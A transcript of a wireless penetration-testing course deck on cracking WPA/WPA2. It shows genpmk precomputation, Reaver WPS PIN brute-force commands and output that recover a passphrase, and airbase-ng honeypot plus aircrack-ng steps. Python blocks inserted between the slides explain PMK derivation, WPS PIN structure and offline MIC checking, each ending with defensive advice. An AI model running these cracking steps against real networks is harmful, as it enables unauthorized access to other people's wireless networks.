WPA-WPA2

47
Wireless Pentest WPA & WPA2


Transcript of WPA-WPA2

Page 1: WPA-WPA2

Wireless Pentest

WPA & WPA2

Page 2: WPA-WPA2

Instructor

Marcos [email protected]

Page 3: WPA-WPA2

Wireless Protected Access

Pages 4-14: WPA-WPA2
Page 15: WPA-WPA2

A little more theory…

Page 16: WPA-WPA2
Page 17: WPA-WPA2

WPA - Pre-Shared Key

Page 18: WPA-WPA2

WPA - Pre-Shared Key

Pages 19-25: WPA-WPA2
Page 26: WPA-WPA2

A little more theory…

Page 27: WPA-WPA2

A little more theory…

Page 28: WPA-WPA2

WPA Attack

Page 29: WPA-WPA2

WPA Attack

Page 30: WPA-WPA2

WPA Attack

Page 31: WPA-WPA2

WPA Attack

Page 32: WPA-WPA2

WPA Attack

Page 33: WPA-WPA2

Decrypting WPA-PSK

Page 34: WPA-WPA2

WPA2 - PSK

• Uses the same principles as WPA
• The weakness lies in the chosen passphrase
• Nothing more to be said!!!!!
• Same procedure as before

Page 35: WPA-WPA2

Speeding up the cracking process

• We can precompute the PMK for a given SSID and a wordlist using the genpmk tool

• genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d PMK-Wireless-Lab -s "Wireless Lab"

• Let's create a WPA-PSK network with the password skysign and capture this network's WPA handshake
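To show why a genpmk table is tied to one SSID, here is the 802.11i passphrase-to-PMK mapping in Python. This is an added example, not code from the slides or from the aircrack-ng project: the PMK is PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations and a 32-byte output, and the same hex value is what wpa_passphrase writes into the psk= line of a wpa_supplicant network block. The SSID "Wireless Lab" and the passphrase skysign come from the slides; the wordlist entries and the throughput sample are constructed here.

```python
import hashlib
import time

# 802.11i passphrase-to-PSK mapping: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
# The SSID is the salt, which is why a PMK table (genpmk, Pyrit) is only valid for one SSID.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key the same way wpa_passphrase, wpa_supplicant and hostapd do."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"),
                               PBKDF2_ITERATIONS, PMK_LEN)


def wpa_supplicant_network_block(ssid: str, passphrase: str) -> str:
    """Return a network={} block carrying the pre-derived 64-hex PMK in psk=, as wpa_passphrase prints it.
    Storing the PMK instead of the cleartext passphrase is the form a wpa-supp.conf should carry."""
    return 'network={\n\tssid="%s"\n\tpsk=%s\n}\n' % (ssid, wpa_pmk(passphrase, ssid).hex())


def precompute_pmk_table(ssid: str, wordlist) -> dict:
    """What genpmk -s <ssid> -f <wordlist> does: one PBKDF2 run per candidate, reusable for every
    handshake captured from that SSID. Candidates for a different SSID get different PMKs."""
    return {word: wpa_pmk(word, ssid) for word in wordlist}


def derivations_per_second(sample: int = 50) -> float:
    """Rough PBKDF2 throughput on this CPU: the cost paid per candidate when no table exists."""
    start = time.perf_counter()
    for i in range(sample):
        wpa_pmk("candidate%d" % i, "Wireless Lab")   # constructed candidates
    return sample / (time.perf_counter() - start)


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE".
    print(wpa_pmk("password", "IEEE").hex())
    # Same passphrase, different SSID: a different PMK, so a table built for "Wireless Lab" is useless elsewhere.
    print(wpa_pmk("skysign", "Wireless Lab") != wpa_pmk("skysign", "Wireless Lab2"))
    print(wpa_supplicant_network_block("Wireless Lab", "skysign"))
    print("%.0f PBKDF2 derivations/s on this CPU" % derivations_per_second())
```

The per-SSID salt is the defensive takeaway: a precomputed table only pays off against networks whose SSID the attacker chose in advance, so a default or very common SSID makes a weak passphrase cheaper to find, while a unique SSID forces a fresh 4096-iteration PBKDF2 per candidate.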

Page 36: WPA-WPA2

Speeding up the cracking process

Page 37: WPA-WPA2

Measure the time taken with aircrack and compare…

Page 38: WPA-WPA2

Using the PMK with aircrack

Page 39: WPA-WPA2

Pyrit for multi-CPU systems

Page 40: WPA-WPA2

How does Reaver work?

• Exploits the vulnerability in WPS (Wi-Fi Protected Setup)
• Brute-forces PINs to reveal the WPA or WPA2 passphrase
• Takes 4 to 10 hours
• Doesn't work on all APs
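The "4 to 10 hours" figure follows from the structure of a WPS PIN, worked through here as an added example (not code from the slides or from Reaver). A WPS PIN is 8 decimal digits whose last digit is a checksum over the first seven, so only 10^7 PINs are well-formed, and because the registration protocol confirms the first four digits separately from the last three, a guesser needs at most 10^4 + 10^3 = 11,000 attempts. The checksum routine is the one from the WPS specification (the same algorithm hostapd and wpa_supplicant use); the PINs checked are the ones that appear in the Reaver output on the following pages, and the 3 seconds/pin rate is the one that output reports.

```python
# WPS PIN structure: 8 decimal digits, the last one a checksum over the first seven, so only 10^7 PINs
# are well-formed. During PIN registration the AP acknowledges the first four digits (message M4)
# separately from the last three (M6), so at most 10^4 + 10^3 attempts are needed rather than 10^7.
# That design flaw, not any weakness in the WPA passphrase itself, is what Reaver exploits.


def wps_checksum(first_seven: int) -> int:
    """Checksum digit as defined in the WPS specification (same algorithm as hostapd/wpa_supplicant)."""
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum of the first seven."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def wps_attempt_bound() -> int:
    """Upper bound on PIN attempts against an AP that confirms the two halves separately."""
    return 10 ** 4 + 10 ** 3


def wps_attack_hours(seconds_per_pin: float) -> tuple:
    """(expected, worst-case) hours at the given attempt rate; expected assumes the PIN is hit halfway."""
    worst = wps_attempt_bound() * seconds_per_pin / 3600
    return worst / 2, worst


if __name__ == "__main__":
    # 12345670, 00005678 and 22838353 appear in the Reaver output on the slides; 12345678 fails the checksum.
    for pin in ("12345670", "00005678", "22838353", "12345678"):
        print(pin, is_valid_wps_pin(pin))
    expected, worst = wps_attack_hours(3.0)   # 3 seconds/pin, the rate the Reaver output reports
    print("expected %.1f h, worst case %.1f h" % (expected, worst))
```

At 3 seconds per attempt the bound gives roughly 4.6 hours on average and 9.2 hours worst case, which is the range the slide quotes. The practical consequence for a network owner is that no passphrase length protects a WPA2-PSK network while external-registrar PIN mode is enabled on the AP; disabling WPS (or at least its PIN method) removes this path entirely, which is also why the attack "doesn't work on all APs".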

Page 41: WPA-WPA2

Cracking via Reaver

1) airmon-ng start wlan0
2) airodump-ng mon0

In another terminal:

3) root@bt:~# reaver -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Switching mon0 to channel 11
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message

Page 42: WPA-WPA2

Cracking via Reaver

root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -v

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 34:08:04:C0:B6:4E

[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 12345670

[+] Trying pin 00005678
[+] Trying pin 01235678
[+] Trying pin 11115670
[+] Trying pin 22225672
[+] Trying pin 33335674
[+] 0.05% complete @ 2012-05-07 20:43:57 (3 seconds/pin)
[+] Trying pin 44445676
[+] Trying pin 55555678
[+] Trying pin 66665670
[+] Trying pin 77775672
[+] Trying pin 88885674
[+] 0.10% complete @ 2012-05-07 20:44:14 (3 seconds/pin)
[+] Trying pin 99995676
[+] Trying pin 00015677
[+] Trying pin 00025676
[+] Trying pin 00035675

Page 43: WPA-WPA2

Cracking via Reaver

• root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv -p 22838353

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)

[+] Trying pin 22838353
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message

[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '22838353'
[+] WPA PSK: 'DECADA1234'
[+] AP SSID: 'multipinguim-2'
[+] Nothing done, nothing to save.

Page 44: WPA-WPA2

Connecting to a WPA network

wpa-supp.conf

Page 45: WPA-WPA2

Connecting to a WPA network

Page 46: WPA-WPA2

Cracking AP-less WPA Personal

• To crack WPA we need the 4-way handshake:
– Authenticator Nonce, Supplicant Nonce, Authenticator MAC, Supplicant MAC.
– But for this attack we don't need all of these packets:

• Either packets 1 & 2 or packets 2 & 3

• To crack it we therefore need a WPA-PSK honeypot for the client to connect to; we only need msg 1 and msg 2.

• We don't need to know any passphrase ;-)
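The exchange described above, simulated in Python as an added example (not code from the slides or from the aircrack-ng suite). The honeypot's message 1 carries only its own ANonce and MAC, which it can produce without knowing the passphrase; the client's message 2 carries SNonce and a MIC keyed by the KCK, the first 16 bytes of PTK = PRF-512(PMK, ANonce, SNonce, AA, SPA). Whoever holds both messages can therefore test a candidate passphrase offline, which is exactly why messages 1 and 2 are enough. The PMK and PRF-512 follow 802.11i and the MIC is the WPA2/CCMP HMAC-SHA1 variant; the EAPOL-Key frame bytes, MAC addresses and nonces are constructed stand-ins rather than a real 802.11 frame, and the passphrase skysign and SSID "Wireless Lab" come from the slides.

```python
import hashlib
import hmac
from dataclasses import dataclass


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    # 802.11i passphrase mapping: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)   # KCK(16) || KEK(16) || TK(32)


def eapol_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    # WPA2 (AES-CCMP) key descriptor: MIC = HMAC-SHA1(KCK, EAPOL-Key frame with MIC zeroed)[:16]
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


@dataclass
class Msg1:            # authenticator -> supplicant: ANonce, no MIC
    aa: bytes
    anonce: bytes


@dataclass
class Msg2:            # supplicant -> authenticator: SNonce plus a MIC under the KCK
    spa: bytes
    snonce: bytes
    frame: bytes       # EAPOL-Key frame as sent with MIC field zeroed (constructed stand-in)
    mic: bytes


def honeypot_msg1(aa: bytes, anonce: bytes) -> Msg1:
    """A rogue AP needs no passphrase to send message 1: it only chooses ANonce."""
    return Msg1(aa, anonce)


def supplicant_msg2(passphrase: str, ssid: str, spa: bytes, snonce: bytes, m1: Msg1) -> Msg2:
    """The real client replies with SNonce and a MIC keyed by KCK = f(PMK, ANonce, SNonce, AA, SPA)."""
    ptk = derive_ptk(wpa_pmk(passphrase, ssid), m1.aa, spa, m1.anonce, snonce)
    frame = b"EAPOL-Key(2/4):" + snonce + bytes(16)   # constructed: payload then a zeroed MIC field
    return Msg2(spa, snonce, frame, eapol_mic(ptk[:16], frame))


def candidate_matches(candidate: str, ssid: str, m1: Msg1, m2: Msg2) -> bool:
    """What the capturing side can decide with messages 1 and 2 only: does this passphrase reproduce the MIC?"""
    ptk = derive_ptk(wpa_pmk(candidate, ssid), m1.aa, m2.spa, m1.anonce, m2.snonce)
    return hmac.compare_digest(eapol_mic(ptk[:16], m2.frame), m2.mic)


# Constructed sample exchange: SSID and passphrase from the slides, fixed MACs and nonces for reproducibility.
SSID = "Wireless Lab"
AA = bytes.fromhex("020000000001")        # constructed honeypot BSSID
SPA = bytes.fromhex("020000000002")       # constructed client MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def run_exchange(passphrase: str = "skysign") -> tuple:
    m1 = honeypot_msg1(AA, ANONCE)
    m2 = supplicant_msg2(passphrase, SSID, SPA, SNONCE, m1)
    return m1, m2


if __name__ == "__main__":
    m1, m2 = run_exchange("skysign")
    print("right passphrase verifies:", candidate_matches("skysign", SSID, m1, m2))
    print("wrong passphrase verifies:", candidate_matches("password", SSID, m1, m2))
```

The MIC binds the passphrase-derived PMK to values the rogue AP either chose (ANonce, AA) or received in the clear (SNonce, SPA), so nothing on the real AP can prevent the check: in WPA/WPA2-Personal the only controls are a high-entropy passphrase and clients that do not auto-join on SSID alone, and WPA3's SAE handshake is what removes the offline check entirely.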

Page 47: WPA-WPA2

Cracking AP-less WPA Personal

1) Set up our honeypot:
airbase-ng -c 3 -a <AP> -e "Wireless Lab" -W 1 -z 2 mon0

2) Start airodump:
airodump-ng -c 3 --bssid <AP> --write sem-AP-WPA-cracking mon0

3) Go back to the airbase screen and watch the clients associating
4) Go back to the airodump screen and check whether it captured the WPA handshake
5) Now run aircrack:
aircrack-ng -w wordlist.txt -b <AP> sem-AP-WPA-cracking-01.cap